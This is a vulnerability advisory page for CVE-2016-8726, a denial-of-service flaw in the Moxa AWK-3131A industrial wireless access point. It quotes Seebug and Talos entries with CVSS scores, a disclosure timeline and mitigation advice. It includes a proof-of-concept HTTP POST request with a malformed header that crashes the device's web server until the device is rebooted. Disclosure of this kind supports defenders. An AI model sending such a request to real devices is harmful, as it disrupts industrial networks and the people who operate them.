Vulnerabilities > CVE-2016-8726 - NULL Pointer Dereference vulnerability in Moxa Awk-3131A Firmware 1.1

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
HIGH
network
low complexity
moxa
CWE-476

Summary

An exploitable null pointer dereference vulnerability exists in the Web Application /forms/web_runScript iw_filename functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. An HTTP POST request with a blank line in the header will cause a segmentation fault in the web server.

Vulnerable Configurations

Part Description Count
OS
Moxa
1
Hardware
Moxa
1

Common Weakness Enumeration (CWE)

Seebug

bulletinFamilyexploit
description### Summary An exploitable null pointer dereference vulnerability exists in the Web Application /forms/webrunScript iwfilename functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. An HTTP POST request with a blank line in the header will cause a segmentation fault in the web server. ### Tested Versions Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1 ### Product URLs http://www.moxa.com/product/AWK-3131A.htm ### CVSSv3 Score 7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H ### Details An exploitable null pointer dereference vulnerability exists in the Web Application /forms/webrunScript iwfilename functionality of Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. An HTTP POST request with a blank line in the header will cause a segmentation fault in the web server. There is no way to restart the web application using legitimate functionality outside of rebooting the device. ### Exploit Proof-of-Concept ``` POST /forms/web_runScript HTTP/1.1 Host: 192.168.127.253 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Length: 871 Accept-Encoding: gzip, deflate Referer: http://192.168.127.253/Troubleshooting.asp Cookie: Password508= Connection: close Content-Type: multipart/form-data; boundary=---------------------------99926971127282895659616238 Content-Length: 591 ``` ### Mitigation To significantly mitigate risk of exploitation, disable the web application before the device is deployed. ### Timeline * 2016-11-18 - Vendor Disclosure * 2017-04-10 - Public Release ### CREDIT * Discovered by Patrick DeSantis of Cisco Talos.
idSSV:96531
last seen2017-11-19
modified2017-09-19
published2017-09-19
reporterRoot
sourcehttps://www.seebug.org/vuldb/ssvid-96531
titleMoxa AWK-3131A web_runScript Header Manipulation Denial of Service Vulnerability(CVE-2016-8726)

Talos

idTALOS-2016-0240
last seen2019-05-29
published2017-04-10
reporterTalos Intelligence
sourcehttp://www.talosintelligence.com/vulnerability_reports/TALOS-2016-0240
titleMoxa AWK-3131A web_runScript Header Manipulation Denial of Service Vulnerability